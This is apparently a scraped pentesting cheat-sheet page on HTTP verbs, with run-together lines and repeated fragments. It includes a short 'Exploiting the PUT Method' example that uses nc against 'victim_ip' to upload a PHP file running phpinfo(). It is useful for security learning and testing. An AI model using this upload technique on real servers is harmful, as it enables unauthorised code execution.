HTTP Verbs
Get
Post
Head
Put
PUT /path/to/destination HTTP/1.1
Host: www.example.com
<Put Data>Exploiting the PUT Method
Delete
Options
Last updated
PUT /path/to/destination HTTP/1.1
Host: www.example.com
<Put Data>Last updated
$ wc -m payload.php
20 payload.php$ nc victim_ip port
PUT /payload.php HTTP/1.0
Content-type: text/html
Content-length: 20
<?php phpinfo(); ?>DELETE /path/to/destination HTTP/1.1
Host: www.example.com